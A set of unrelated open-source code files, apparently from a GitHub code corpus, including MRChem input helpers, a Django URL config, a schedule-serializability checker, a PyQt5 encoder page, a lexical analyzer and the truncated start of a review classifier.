                "file_y_p": f"{path_orbitals}/Y_p_rsp_{dir:d}",
                "file_y_a": f"{path_orbitals}/Y_a_rsp_{dir:d}",
                "file_y_b": f"{path_orbitals}/Y_b_rsp_{dir:d}",
            }
        # only attach a solver for the directions the user asked to run
        if rsp_dict["run"][dir]:
            rsp_comp["rsp_solver"] = write_rsp_solver(user_dict, wf_dict, dir)
        rsp_calc["components"].append(rsp_comp)
    return rsp_calc
def write_rsp_fock(user_dict, wf_dict):
    """Assemble the perturbed Fock operator section for linear response.

    Coulomb is included for all mean-field methods, exact exchange for
    HF/DFT, and the XC functional block (parsed from "name [coef]" lines)
    for DFT only.
    """
    precisions = user_dict["Precisions"]
    method = wf_dict["method_type"]
    fock_dict = {}
    # Coulomb
    if method in ("hartree", "hf", "dft"):
        fock_dict["coulomb_operator"] = {
            "poisson_prec": precisions["poisson_prec"],
            "shared_memory": user_dict["MPI"]["share_coulomb_potential"],
        }
    # Exchange
    if method in ("hf", "dft"):
        fock_dict["exchange_operator"] = {
            "poisson_prec": precisions["poisson_prec"],
            "exchange_prec": precisions["exchange_prec"],
        }
    # Exchange-Correlation
    if method == "dft":
        func_dict = []
        for line in wf_dict["dft_funcs"].split("\n"):
            fields = line.split()
            if not fields:
                continue
            # a trailing number is the functional coefficient; default 1.0
            coef = float(fields[1]) if len(fields) > 1 else 1.0
            func_dict.append({"name": fields[0].lower(), "coef": coef})
        fock_dict["xc_operator"] = {
            "shared_memory": user_dict["MPI"]["share_xc_potential"],
            "xc_functional": {
                "spin": user_dict["DFT"]["spin"],
                "cutoff": user_dict["DFT"]["density_cutoff"],
                "functionals": func_dict,
            },
        }
    return fock_dict
def write_rsp_solver(user_dict, wf_dict, d):
    """Assemble the response solver input for cartesian direction ``d``.

    Negative precision values mean "not set": the final precision falls
    back to the global world precision, and the starting precision falls
    back to the final precision.
    """
    rsp = user_dict["Response"]
    final_prec = rsp["final_prec"]
    if final_prec < 0.0:
        final_prec = user_dict["world_prec"]
    start_prec = rsp["start_prec"]
    if start_prec < 0.0:
        start_prec = final_prec
    chk_dir = rsp["path_checkpoint"]
    return {
        "method": wf_dict["method_name"],
        "kain": rsp["kain"],
        "max_iter": rsp["max_iter"],
        "file_chk_x": f"{chk_dir}/X_rsp_{d}",
        "file_chk_y": f"{chk_dir}/Y_rsp_{d}",
        "checkpoint": rsp["write_checkpoint"],
        "start_prec": start_prec,
        "final_prec": final_prec,
        "orbital_thrs": rsp["orbital_thrs"],
        "property_thrs": rsp["property_thrs"],
        "helmholtz_prec": user_dict["Precisions"]["helmholtz_prec"],
        "orth_prec": 1.0e-14,
    }
def parse_wf_method(user_dict):
    """Normalize the wavefunction method/relativity/environment settings.

    Returns a dict of display names and the canonical method type used by
    the other write_* helpers.  NOTE: this function also mutates
    ``user_dict`` in place (it canonicalizes the "relativity" keyword and
    the ZORA include flags).  Raises RuntimeError for an unknown method
    or an inconsistent ZORA setup.
    """
    method_name = ""
    restricted = user_dict["WaveFunction"]["restricted"]
    method_type = user_dict["WaveFunction"]["method"].lower()
    dft_funcs = user_dict["DFT"]["functionals"].lower()
    if method_type in ["core"]:
        method_name = "Core Hamiltonian"
    elif method_type in ["hartree"]:
        method_name = "Hartree"
    elif method_type in ["hf", "hartree-fock", "hartreefock"]:
        method_name = "Hartree-Fock"
        method_type = "hf"
    elif method_type in ["dft"]:
        method_name = "DFT"
    elif method_type in ["lda"]:
        # "lda" is shorthand for DFT with the SVWN5 functional
        method_name = "DFT (SVWN5)"
        dft_funcs = "svwn5"
        method_type = "dft"
    elif method_type in SHORTHAND_FUNCTIONALS:
        # any other recognized functional shorthand selects plain DFT
        method_name = "DFT (" + method_type.upper() + ")"
        dft_funcs = method_type
        method_type = "dft"
    else:
        raise RuntimeError(
            f"Invalid wavefunction method {user_dict['WaveFunction']['method']}"
        )
    # Determine relativity name label for print outs to the output file
    relativity_name = "None"
    if user_dict["WaveFunction"]["relativity"].lower() in ["none"]:
        user_dict["WaveFunction"]["relativity"] = "off"
        user_dict["ZORA"]["include_nuclear"] = False
        user_dict["ZORA"]["include_coulomb"] = False
        user_dict["ZORA"]["include_xc"] = False
    # "nzora" = nuclear-only ZORA; rewritten to plain "zora" with only
    # the nuclear term enabled, then handled by the branch below
    if user_dict["WaveFunction"]["relativity"].lower() in ["nzora"]:
        user_dict["WaveFunction"]["relativity"] = "zora"
        user_dict["ZORA"]["include_nuclear"] = True
        user_dict["ZORA"]["include_coulomb"] = False
        user_dict["ZORA"]["include_xc"] = False
    if user_dict["WaveFunction"]["relativity"].lower() in ["zora"]:
        components = [
            user_dict["ZORA"]["include_nuclear"],
            user_dict["ZORA"]["include_coulomb"],
            user_dict["ZORA"]["include_xc"],
        ]
        names = ["V_nuc", "J", "V_xc"]
        if any(components):
            # e.g. "ZORA (V_nuc + J)" listing the enabled potential terms
            zora_terms = " + ".join(
                [name for name, comp in zip(names, components) if comp]
            )
            relativity_name = "ZORA (" + zora_terms + ")"
        else:
            raise RuntimeError("ZORA selected, but no ZORA potential included")
        if user_dict["ZORA"]["include_xc"] and not restricted:
            raise RuntimeError(
                "ZORA (V_xc) not available for unrestricted wavefunctions"
            )
    # Determine environment name label for print outs to the output file
    environment_name = "None"
    if user_dict["WaveFunction"]["environment"].lower() == "pcm":
        environment_name = "PCM"
    # Determine external name label for print outs to the output file
    ext_dict = user_dict["ExternalFields"]
    has_external_fields = len(ext_dict["electric_field"]) > 0
    external_name = "None"
    if has_external_fields:
        # If no external fields, then the list will be empty
        # Need to catch the exception and store placeholders
        try:
            x, y, z = ext_dict["electric_field"]
        except ValueError:
            x, y, z = None, None, None  # Useless placeholders
        # Labels to aggregate
        external_name = f"Electric field ({x}, {y}, {z})"
    wf_dict = {
        "relativity_name": relativity_name,
        "environment_name": environment_name,
        "external_name": external_name,
        "method_name": method_name,
        "method_type": method_type,
        "dft_funcs": dft_funcs,
    }
    return wf_dict
| MRChemSoft/mrchem | python/mrchem/helpers.py | helpers.py | py | 18,587 | python | en | code | 22 | github-code | 36 |
72911967144 | """The URL configuration of the application
When the particular URL is hit it feeds the request to the corresponding view.
"""
from django.urls import path
from django.views.generic import RedirectView
from .views import base, add_to_registry, validate_url, issue_registry, dashboard
urlpatterns = [
path('base/', base),
path('add/', add_to_registry),
path('api/validate_url', validate_url),
path('issue_registry/', issue_registry),
path('dashboard/', dashboard, name='dashboard'),
path('', RedirectView.as_view(pattern_name='dashboard', permanent=False)),
]
| architsingh15/django-radius-github | issue_tracker/urls.py | urls.py | py | 585 | python | en | code | 1 | github-code | 36 |
38514393390 | """
This module contains functions to check whether a schedule is:
1. view-serializable
2. conflict-serializable
3. recoverable
4. avoids cascading aborts
5. strict
It also contains some nice functions to tabularize schedules into tex and draw
a conflict graph using matplotlib.
"""
from action import *
from collections import defaultdict
import itertools
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
################################################################################
# helper functions
################################################################################
def flatten(ls):
    """
    >>> flatten([[], [1], [2,3], [4]])
    [1, 2, 3, 4]
    """
    flattened = []
    for sub in ls:
        flattened.extend(sub)
    return flattened
def graphs_eq(g1, g2):
    """
    Returns if two networkx graphs are 100% identical.

    >>> G1 = nx.DiGraph()
    >>> G1.add_nodes_from([1, 2, 3])
    >>> G1.add_edges_from([(1, 2), (2, 3), (3, 1)])
    >>> G2 = nx.DiGraph()
    >>> G2.add_nodes_from([3, 2, 1])
    >>> G2.add_edges_from([(3, 1), (2, 3), (1, 2)])
    >>> G3 = nx.DiGraph()
    >>> G3.add_nodes_from([1, 2, 3, 4])
    >>> G3.add_edges_from([(1, 2), (2, 3), (3, 1)])
    >>> G4 = nx.DiGraph()
    >>> G4.add_nodes_from([1, 2, 3])
    >>> G4.add_edges_from([(1, 2), (2, 3), (3, 1), (1, 4)])
    >>> graphs_eq(G1, G2)
    True
    >>> graphs_eq(G2, G1)
    True
    >>> graphs_eq(G1, G3)
    False
    >>> graphs_eq(G1, G4)
    False
    """
    # compare node sets and edge sets exactly; for DiGraphs edge
    # direction matters since edges are (u, v) tuples
    return (set(g1.nodes()) == set(g2.nodes()) and
            set(g1.edges()) == set(g2.edges()))
def transaction_ids(schedule):
    """
    Return a list of the _unique_ transaction ids in the schedule in the order
    that they appear.

    >>> transaction_ids([r(1, "A"), r(2, "A"), w(1, "A"), r(3, "A")])
    [1, 2, 3]
    """
    # dict.fromkeys de-duplicates while preserving first-seen order
    return list(dict.fromkeys(a.i for a in schedule))
def transactions(schedule):
    """
    Partitions a schedule into the list of transactions that compose it.
    Transactions are returned in the order in which an operation of the
    transaction first appears.

    >>> transactions([
    ...     r(1, "A"),
    ...     w(2, "A"),
    ...     commit(2),
    ...     w(1, "A"),
    ...     commit(1),
    ...     w(3, "A"),
    ...     commit(3),
    ... ])
    [[R_1(A), W_1(A), Commit_1], [W_2(A), Commit_2], [W_3(A), Commit_3]]

    >>> transactions([
    ...     w(2, "A"),
    ...     r(1, "A"),
    ...     commit(2),
    ...     w(1, "A"),
    ...     commit(1),
    ...     w(3, "A"),
    ...     commit(3),
    ... ])
    [[W_2(A), Commit_2], [R_1(A), W_1(A), Commit_1], [W_3(A), Commit_3]]
    """
    js = transaction_ids(schedule)
    # one (initially empty) partition per transaction, in first-seen order
    partitions = [[] for _ in range(len(js))]
    # transaction id -> index of its partition (the comprehension variable
    # intentionally shadows the outer `js` list)
    index = {js: i for (i, js) in enumerate(js)}
    for a in schedule:
        partitions[index[a.i]].append(a)
    return partitions
def drop_aborts(schedule):
    """
    Remove all transactions that abort.

    >>> drop_aborts([r(1, "A"), r(2, "A"), r(3, "A"), abort(1), commit(2), abort(3)])
    [R_2(A), Commit_2]
    """
    # ids of every transaction that issues an ABORT anywhere in the schedule
    aborteds = {a.i for a in schedule if a.op == ABORT}
    return [a for a in schedule if a.i not in aborteds]
def add_commits(schedule):
    """
    Add a commit for every transaction that doesn't end in a commit or abort.
    Commits are added in the order of the first action of the transaction.

    >>> add_commits([r(1, "A"), r(2, "A"), r(3, "A"), r(4, "A"), commit(2), abort(4)])
    [R_1(A), R_2(A), R_3(A), R_4(A), Commit_2, Abort_4, Commit_1, Commit_3]
    """
    # transactions that already terminate with a commit or an abort
    ends = {a.i for a in schedule if a.op == COMMIT or a.op == ABORT}
    no_ends = [i for i in transaction_ids(schedule) if i not in ends]
    # appended commits keep the first-appearance order of the transactions
    return schedule + [commit(i) for i in no_ends]
def first_read(schedule):
    """
    Returns a mapping from each object to the transaction ids that initially
    read it. If an object is never read, it is not included in the return.

    >>> first_read([w(1, "A"), w(2, "B")])
    {}
    >>> first_read([r(1, "A"), r(2, "B"), r(2, "A")])
    {'A': [1, 2], 'B': [2]}
    """
    fr = defaultdict(list)
    # objects that have been written already; a read of such an object is
    # no longer a read of the *initial* value
    written = set()
    for a in schedule:
        if a.op == READ and a.obj not in written:
            fr[a.obj].append(a.i)
        elif a.op == WRITE:
            written.add(a.obj)
    return dict(fr)
def number(schedule):
    """
    Enumerates each action according to its appearance within its transaction.
    The enumeration begins at 0.

    >>> number([r(1, "A"), r(1, "B"), r(2, "A"), w(3, "A"), commit(2)])
    [(0, R_1(A)), (1, R_1(B)), (0, R_2(A)), (0, W_3(A)), (1, Commit_2)]
    """
    # per-transaction running counters, all starting at 0
    ns = {i: 0 for i in transaction_ids(schedule)}
    s = []
    for a in schedule:
        s.append((ns[a.i], a))
        ns[a.i] += 1
    return s
def view_graph(schedule):
    """
    First, the schedule is numbered using the number function. Then, an edge is
    added from each read of an object to the most recent write to the same
    object.

    >>> view_graph([w(1, "A"), r(2, "A"), r(1, "A")]) #doctest: +SKIP
    +------------+     +------------+
    | (0, W_1(A) |<----| (0, R_2(A) |
    +------------+     +------------+
          ^
          |
    +------------+
    | (1, R_1(A) |
    +------------+
    """
    G = nx.DiGraph()
    # object -> the numbered action of the most recent write to it
    last_written = {}
    for (i, a) in number(schedule):
        if a.op == WRITE:
            last_written[a.obj] = (i, a)
        elif a.op == READ:
            # reads of the initial value (no prior write) get no edge
            if a.obj in last_written:
                G.add_edge((i, a), last_written[a.obj])
        else: # a.op == COMMIT or a.op == ABORT
            pass
    return G
def last_written(schedule):
    """
    Returns a mapping from each object to the transaction id that last writes
    it. If an object is never written, it is not included in the return.

    >>> last_written([r(1, "A"), r(2, "B")])
    {}
    >>> last_written([w(1, "A"), w(2, "B"), w(2, "A")])
    {'A': 2, 'B': 2}
    """
    lw = {}
    # later writes simply overwrite earlier entries, so the final value is
    # the id of the last writer
    for a in schedule:
        if a.op == WRITE:
            lw[a.obj] = a.i
    return lw
def view_equivalent(s1, s2):
    """
    Two schedules s1 and s2 are view equivalent if

    1. If Ti reads the initial value of object A in s1, it must also read
       the initial value of A in s2.
    2. If Ti reads a value of A written by Tj in s1, it must also read the
       value of A written by Tj in s2.
    3. For each data object A, the transaction (if any) that performs the
       final write on A in s1 must also perform the final write on A in s2.
    """
    # both schedules must be over the same set of transactions
    assert set(transaction_ids(s1)) == set(transaction_ids(s2))
    # condition 1
    if not (first_read(s1) == first_read(s2)):
        return False
    # condition 2
    if not graphs_eq(view_graph(s1), view_graph(s2)):
        return False
    # condition 3
    if not (last_written(s1) == last_written(s2)):
        return False
    return True
################################################################################
# predicates
################################################################################
def view_serializable(schedule):
    """
    A schedule is view serializable if it is view equivalent to a some serial
    schedule over the same transactions. Aborted transactions are ignored.
    """
    schedule = drop_aborts(schedule)
    # conflict serializability implies view serializability
    if conflict_serializable(schedule):
        return True
    # if a schedule is not conflict serializable but doesn't have blind writes,
    # then it isn't view serializable
    partitions = transactions(schedule)
    blind_write = False
    for t in partitions:
        objects_read = set()
        for a in t:
            # a write to an object the transaction has not read first
            if a.op == WRITE and a.obj not in objects_read:
                blind_write = True
            elif a.op == READ:
                objects_read.add(a.obj)
            else: # a.op == COMMIT or a.op == ABORT
                pass
    if not blind_write:
        return False
    # brute force check over all serializations to see if the schedule is view
    # equivalent to any serial schedule over the same set of transactions
    # (factorial in the number of transactions)
    for s in itertools.permutations(transactions(schedule)):
        s = flatten(list(s))
        if view_equivalent(s, schedule):
            return True
    return False
def conflict_serializable(schedule):
    """
    A schedule is conflict serializable if its conflict graph is acyclic.
    Aborted transactions are ignored.
    """
    # acyclic <=> no simple cycles in the conflict graph
    return len(list(nx.simple_cycles(conflict_graph(schedule)))) == 0
def recoverable(schedule):
    """
    A schedule is recoverable if all the transactions whose changes it read
    commit and the schedule commits after them.
    """
    schedule = add_commits(schedule)
    written_by = defaultdict(list) # object -> ids
    read_from = defaultdict(set) # id -> ids
    committed = set() # ids
    for a in schedule:
        if a.op == WRITE:
            written_by[a.obj].append(a.i)
        elif a.op == READ:
            # reading another transaction's most recent write creates a
            # commit-ordering dependency on that writer
            if a.obj in written_by and \
               len(written_by[a.obj]) > 0 and \
               written_by[a.obj][-1] != a.i:
                read_from[a.i].add(written_by[a.obj][-1])
        elif a.op == COMMIT:
            # every transaction we read from must have committed first
            if not all(i in committed for i in read_from[a.i]):
                return False
            committed.add(a.i)
        elif a.op == ABORT:
            # scrub the aborted transaction's writes
            # (fixed: dict.iteritems() is Python 2 only; raised
            # AttributeError on Python 3 — use items())
            for (o, ids) in written_by.items():
                written_by[o] = [i for i in ids if i != a.i]
    return True
def aca(schedule):
    """A schedule avoids cascading aborts if it only reads commited changes."""
    schedule = add_commits(schedule)
    last_write = defaultdict(list) # object -> ids
    committed = set() # ids
    for a in schedule:
        if a.op == WRITE:
            last_write[a.obj].append(a.i)
        elif a.op == READ:
            # reading an uncommitted write by some *other* transaction means
            # an abort of the writer would cascade to the reader
            if a.obj in last_write and \
               len(last_write[a.obj]) > 0 and \
               last_write[a.obj][-1] not in committed \
               and last_write[a.obj][-1] != a.i:
                return False
        elif a.op == COMMIT:
            committed.add(a.i)
        elif a.op == ABORT:
            # scrub the aborted transaction's writes
            # (fixed: dict.iteritems() is Python 2 only; raised
            # AttributeError on Python 3 — use items())
            for (o, ids) in last_write.items():
                last_write[o] = [i for i in ids if i != a.i]
    return True
def strict(schedule):
    """
    A schedule is strict if never reads or writes to an uncommited changed
    variable.
    """
    schedule = add_commits(schedule)
    last_write = defaultdict(list) # object -> id
    committed = set() # ids
    for a in schedule:
        if a.op == WRITE or a.op == READ:
            # touching an object whose latest writer is some *other*
            # uncommitted transaction violates strictness
            if a.obj in last_write and \
               len(last_write[a.obj]) > 0 and \
               last_write[a.obj][-1] not in committed and \
               last_write[a.obj][-1] != a.i:
                return False
            if a.op == WRITE:
                last_write[a.obj].append(a.i)
        elif a.op == COMMIT:
            committed.add(a.i)
        elif a.op == ABORT:
            # scrub the aborted transaction's writes
            # (fixed: dict.iteritems() is Python 2 only; raised
            # AttributeError on Python 3 — use items())
            for (o, ids) in last_write.items():
                last_write[o] = [i for i in ids if i != a.i]
    return True
################################################################################
# misc
################################################################################
def tex(schedule):
    """
    Return a texed tabular representation of a schedule.

    >>> tex([r(1,"A"), r(1,"B"), r(2,"B"), r(3,"B"), r(1,"A"), r(2,"B")]) #doctest: +SKIP
    +--------+--------+--------+
    |  T_1   |  T_2   |  T_3   |
    +--------+--------+--------+
    | R_1(A) |        |        |
    | R_1(B) |        |        |
    |        | R_2(B) |        |
    |        |        | R_3(B) |
    | R_1(A) |        |        |
    |        | R_2(B) |        |
    +--------+--------+--------+
    """
    # local name shadows the module-level transactions() function
    transactions = sorted(transaction_ids(schedule))
    # one centered column per transaction
    s = r"\begin{tabular}{" + ("|" + "|".join("c" for _ in transactions) + "|" )+ "}\n"
    s += r"\hline" + "\n"
    s += "&".join("$T_{}$".format(t) for t in transactions) + r"\\\hline" + "\n"
    for a in schedule:
        # each action occupies only its own transaction's column
        index = transactions.index(a.i)
        s += ("&" * index) + a.tex() + ("&" * (len(transactions) - 1 - index))
        s += r"\\\hline" + "\n"
    s += r"\end{tabular}" + "\n"
    return s
def conflict_graph(schedule):
    """
    A graph with an edge from a to b for each pair of actions (a, b) from
    different transactions on the same object where at least one of the actions
    is a write and a precedes b.
    """
    schedule = drop_aborts(schedule)
    G = nx.DiGraph()
    G.add_nodes_from(transaction_ids(schedule))
    # O(n^2) scan over ordered action pairs (a before b)
    for (i, a) in enumerate(schedule):
        for b in schedule[i+1:]:
            same_obj = a.obj == b.obj
            diff_txn = a.i != b.i
            conflict = a.op == WRITE or b.op == WRITE
            if same_obj and diff_txn and conflict:
                G.add_edge(a.i, b.i)
    return G
def draw(G):
    """Prettily draw a networkx graph G."""
    plt.figure()
    # one evenly-spaced colormap value per node
    color_range = np.linspace(0, 1, len(G.nodes()))
    # label each node n as "T_n" in TeX math mode
    labels = {n: "$T_{{{}}}$".format(n) for n in G}
    pos = nx.spectral_layout(G)
    kwargs = {
        "alpha": 1.0,
        "cmap": plt.get_cmap("Dark2"), # http://bit.ly/1ItQDgE
        "font_color": "w",
        "font_size": 40,
        "labels": labels,
        "node_color": color_range,
        "node_size": 10000,
        "pos": pos, # http://bit.ly/1DAnT4y
        "width": 4.0,
        "with_labels": True,
    }
    nx.draw(G, **kwargs)
if __name__ == "__main__":
    # run this module's doctests when executed directly
    import doctest
    doctest.testmod()
| mwhittaker/serial | serial.py | serial.py | py | 13,575 | python | en | code | 2 | github-code | 36 |
5199805944 | from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from widgets.mixins import TextColorMixin
from utils.encoders import EncodeMethod, create_encoder
from strings import _
class EncodePage(QWidget, TextColorMixin):
    """Two-pane encode/decode page: plain text on the left, encoded text on
    the right, with radio buttons selecting the encoding method."""
    def __init__(self, parent=None):
        super(EncodePage, self).__init__(parent)
        self.setupUi()
    def setupUi(self):
        """Build the widget tree and wire up signals (called once from __init__)."""
        self.method_base64 = self.create_method_radio('BASE64', EncodeMethod.base64)
        self.method_md5 = self.create_method_radio('MD5', EncodeMethod.md5)
        self.method_url = self.create_method_radio('URL', EncodeMethod.url)
        self.method_html = self.create_method_radio('HTML', EncodeMethod.html)
        btnEncode = QPushButton('&Encode')
        btnDecode = QPushButton('&Decode')
        self.src_edit = QTextEdit()
        self.src_edit.setFixedHeight(300)
        self.dest_edit = QTextEdit()
        self.dest_edit.setFixedHeight(300)
        # top row: method label + radio buttons
        method_box = QHBoxLayout()
        method_box.addWidget(QLabel(_('method')))
        method_box.addWidget(self.method_base64)
        method_box.addWidget(self.method_md5)
        method_box.addWidget(self.method_url)
        method_box.addWidget(self.method_html)
        method_box.addStretch()
        # middle column: encode/decode buttons between the two editors
        btnBox = QVBoxLayout()
        btnBox.addStretch()
        btnBox.addWidget(btnEncode)
        btnBox.addWidget(btnDecode)
        btnBox.addStretch()
        center_box = QHBoxLayout()
        center_box.addWidget(self.src_edit, 1)
        center_box.addLayout(btnBox)
        center_box.addWidget(self.dest_edit, 1)
        vbox = QVBoxLayout()
        vbox.addLayout(method_box)
        vbox.addLayout(center_box)
        vbox.addStretch()
        self.setLayout(vbox)
        btnEncode.clicked.connect(self.on_encode)
        btnDecode.clicked.connect(self.on_decode)
        # live conversion while typing (see the focus guards below)
        self.src_edit.textChanged.connect(self.on_srcEdit_textChanged)
        self.dest_edit.textChanged.connect(self.on_destEdit_textChanged)
    def create_method_radio(self, text, value):
        """Create a radio button carrying its EncodeMethod in a 'value' property."""
        radio = QRadioButton(text)
        radio.setProperty('value', value)
        return radio
    def on_initialized(self):
        # default method: BASE64
        self.method_base64.setChecked(True)
    def get_encoder(self):
        """Return the encoder matching the currently checked radio button
        (BASE64 when none of the others is checked)."""
        method = EncodeMethod.base64
        if self.method_md5.isChecked():
            method = EncodeMethod.md5
        elif self.method_url.isChecked():
            method = EncodeMethod.url
        elif self.method_html.isChecked():
            method = EncodeMethod.html
        return create_encoder(method)
    @pyqtSlot()
    def on_encode(self):
        """Encode the left pane into the right pane; errors are shown in the
        destination pane via the TextColorMixin color flag."""
        try:
            src = self.src_edit.toPlainText().strip()
            encoder = self.get_encoder()
            result = encoder.encode(src)
            self.setColoredText(self.dest_edit, result, True)
        except Exception as e:
            self.setColoredText(self.dest_edit, str(e), False)
    @pyqtSlot()
    def on_decode(self):
        """Decode the right pane back into the left pane (mirror of on_encode)."""
        try:
            src = self.dest_edit.toPlainText().strip()
            encoder = self.get_encoder()
            result = encoder.decode(src)
            self.setColoredText(self.src_edit, result, True)
        except Exception as e:
            self.setColoredText(self.src_edit, str(e), False)
    @pyqtSlot()
    def on_srcEdit_textChanged(self):
        # only react to user edits: hasFocus() prevents re-triggering when
        # on_decode writes into this editor programmatically
        if self.src_edit.hasFocus():
            self.on_encode()
    @pyqtSlot()
    def on_destEdit_textChanged(self):
        if self.dest_edit.hasFocus():
            self.on_decode()
| shuhari/DevToolbox | src/pages/py/encode_page.py | encode_page.py | py | 3,455 | python | en | code | 0 | github-code | 36 |
789669298 | import argparse
from experiment import Experiment
import Limited_GP
# Command-line entry point: run the Limited-GP solver on a COCO suite,
# optionally splitting the work into batches for parallel execution.
parser = argparse.ArgumentParser()
parser.add_argument('--number-of-batches', type=int, default=1)
parser.add_argument('--current-batch', type=int, default=1)
parser.add_argument('--budget', type=int, default=10000)
parser.add_argument('--suite-name', default='bbob')
args = parser.parse_args()
e = Experiment(suite_name=args.suite_name, solver=Limited_GP.solve, algorithm_name='Limited-GP')
e.run(budget=args.budget, current_batch=args.current_batch, number_of_batches=args.number_of_batches)
| pfnet-research/limited-gp | solver/run.py | run.py | py | 564 | python | en | code | 5 | github-code | 36 |
3238091001 | import math
import numpy as np
import pandas as pd
def distance(point1,point2):
    """Euclidean distance between two 2-D points (indexables with x at [0]
    and y at [1]).  math.hypot is both shorter and numerically more robust
    than sqrt(pow(dx, 2) + pow(dy, 2))."""
    return math.hypot(point1[0] - point2[0], point1[1] - point2[1])
points = []
center_points = []
K = 0
# coordinate CSV produced by the earlier pipeline steps (absolute Windows path)
file="D:\\experiment\\第三次豆瓣\\测试3\\train\\douban_train_zuobiao.csv"
data=pd.read_csv(file)
train_data = np.array(data)  # np.ndarray; one row per record
#print(type(train_data))
all_list=train_data.tolist()  # convert to a plain list of rows
#print(all_list)
# collect the (x, y) coordinate columns (row[1], row[2]) of every record
for item in all_list:
    print(item[1])
    print(item[2])
    print("-----------------------")
    point = [item[1], item[2]]
    points.append(point)
#print(type(points))  # every point stored in the list
points = np.array(points)  # convert to an ndarray
#print(points)
# T = mean over all points of the mean distance to every other point
T = 0
for item in points:
    avg = 0
    for other in points:
        if all(other == item):
            continue
        avg += distance(item,other)
    # NOTE(review): 181 and 182 look like the dataset size minus one and the
    # dataset size, hard-coded — should presumably be len(points) - 1 and
    # len(points); TODO confirm against the training CSV
    avg /= 181
    print("当前点的平均距离为:",avg)
    T += avg
T /= 182
print("T值为:",T) | JiaoZixun/Recommend_By_Canopy-K-means | recommend——豆瓣/step3———确定T值.py | step3———确定T值.py | py | 984 | python | en | code | 18 | github-code | 36 |
21535691646 |
def semantic_validity_factory(value, semantic_name, null_values=set(['Unspecified', 'N/A', '', 0, None]), **kwargs) :
    """Classify `value` using keyword predicate functions.

    Keyword arguments whose names contain 'semantic' gate whether the value
    belongs to the semantic type at all; those containing 'valid' gate its
    validity.  Returns a (semantic_name or None, 'valid'/'invalid'/None)
    pair; null-like values yield (None, None).
    """
    if value in null_values:
        # null-like values carry no semantic information
        return (None, None)
    semantic_checks = [f for name, f in kwargs.items() if 'semantic' in name]
    if not all(check(value) for check in semantic_checks):
        # only checking for semantic type!
        return (None, None)
    validity_checks = [f for name, f in kwargs.items() if 'valid' in name]
    if all(check(value) for check in validity_checks):
        return (semantic_name, 'valid')
    return (semantic_name, 'invalid')
| charlesdguthrie/bigDataProject | scripts/semantic_validity_factory.py | semantic_validity_factory.py | py | 516 | python | en | code | 1 | github-code | 36 |
14432332319 | #from ast import If
#from pprint import pp
#from typing import final
from genericpath import exists
from multiprocessing.reduction import duplicate
import re
import string
from unittest import result
from tokens import tokens
from tkinter import *
from tkinter import messagebox as MessageBox
from tkinter import messagebox
#from Interfaz import datos
#resultReservadas = []
#resultCaracteresEspeciales = []
#resultDelimitadores = []
class analizador:
    # shared instance of the token table (the class attributes of the
    # imported `tokens` class are still referenced directly below)
    tokens = tokens()
    def inicio_analizador(self, palabras):
        """Lexically classify `palabras` into reserved words, special
        characters, delimiters, identifiers/numbers ("indefinidas") and
        lexical errors.

        Recognized tokens are removed from `palabras` in place; the return
        value is [reservadas, especiales, delimitadores, indefinidas,
        digitos, errores] (digitos is kept for interface compatibility and
        stays empty — pure digit strings are classified as indefinidas).
        """
        resultReservadas = []
        resultCaracteresEspeciales = []
        resultDelimitadores = []
        resultIndefinidas = []
        resultErrores = []
        resultDigitos = []
        listResultados = []
        print("--- Lexico ---")
        # BUG FIX: the original called palabras.remove(i) while iterating
        # over `palabras` itself, which silently skips the element right
        # after every removal; iterate over a snapshot instead.
        for i in list(palabras):
            if i in tokens.reservadas:
                resultReservadas.append(i)
                palabras.remove(i)
            elif i in tokens.caracteres_especiales:
                resultCaracteresEspeciales.append(i)
                palabras.remove(i)
            elif i in tokens.delimitadores:
                resultDelimitadores.append(i)
                palabras.remove(i)
        # whatever is left is either an identifier/number or an error
        for palabra in palabras:
            if re.search("[a-zA-Z][a-zA-Z0-9_]*", palabra):
                resultIndefinidas.append(palabra)
            elif re.search("^[0-9]+$", palabra):
                resultIndefinidas.append(palabra)
            else:
                resultErrores.append(palabra)
        print("Token Reservadas: ", resultReservadas)
        print("Token Caracteres Especiales: ", resultCaracteresEspeciales)
        print("Token Delimitadores: ", resultDelimitadores)
        print("Token Indefinidas: ", resultIndefinidas)
        print("Errores: ", resultErrores)
        listResultados.append(resultReservadas)
        listResultados.append(resultCaracteresEspeciales)
        listResultados.append(resultDelimitadores)
        listResultados.append(resultIndefinidas)
        listResultados.append(resultDigitos)
        listResultados.append(resultErrores)
        return listResultados
| AngelHernandez20/Mantenimiento | analizadorlexico.py | analizadorlexico.py | py | 2,210 | python | pt | code | 0 | github-code | 36 |
484991740 |
# features - word cnt, character cnt, sentence cnt, word freq
import sys
import time
import json
import string
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
import numpy as np
import pandas as pd
porter = PorterStemmer()
stop_words = set(stopwords.words('english'))
train_file = "/Users/aparahuja/Desktop/IITD/ML/Assignment 2/Q1/reviews_Digital_Music_5.json/Music_Review_train.json"
test_file = "/Users/aparahuja/Desktop/IITD/ML/Assignment 2/Q1/reviews_Digital_Music_5.json/Music_Review_test.json"
if len(sys.argv) > 1:
train_file = sys.argv[1]
test_file = sys.argv[2]
train_data = pd.read_json(train_file, lines=True)
test_data = pd.read_json(test_file, lines=True)
vocabulary = set()
theta = {}
phi = {}
cnt = {}
m = len(train_data)
def F1_Confusion(y_true, y_predict):
    """Print per-class and macro F1 for 5-class labels in 1..5 and return
    the macro F1.

    Builds a 5x5 confusion matrix indexed [true-1][pred-1].  (The local
    names `fn`/`fp` are swapped relative to the usual definitions, but the
    F1 formula is symmetric in them, so the score is unaffected.)
    """
    confusion = np.zeros((5, 5))
    n = len(y_true)
    for i in range(n):
        confusion[int(y_true[i]) - 1][int(y_predict[i]) - 1] += 1
    print("F1 scores:")
    f1_avg = 0
    for i in range(5):
        tp = confusion[i][i]
        fn = sum([confusion[j][i] if i != j else 0 for j in range(5)])
        fp = sum([confusion[i][j] if i != j else 0 for j in range(5)])
        denom = tp + (fp + fn) / 2
        # fixed: guard against 0/0 for classes absent from both the truth
        # and the predictions, which previously produced NaN macro F1
        f1_score = tp / denom if denom > 0 else 0.0
        f1_avg += f1_score / 5
        print("\tClass " + str(i+1) + " = " + "{:.5f}".format(f1_score))
    print("Macro F1 score = " + "{:.5f}".format(f1_avg))
    return f1_avg
def tokenize(review):
    """Tokenize a review: lowercase, strip punctuation, keep alphabetic
    tokens only, Porter-stem them, and drop English stopwords."""
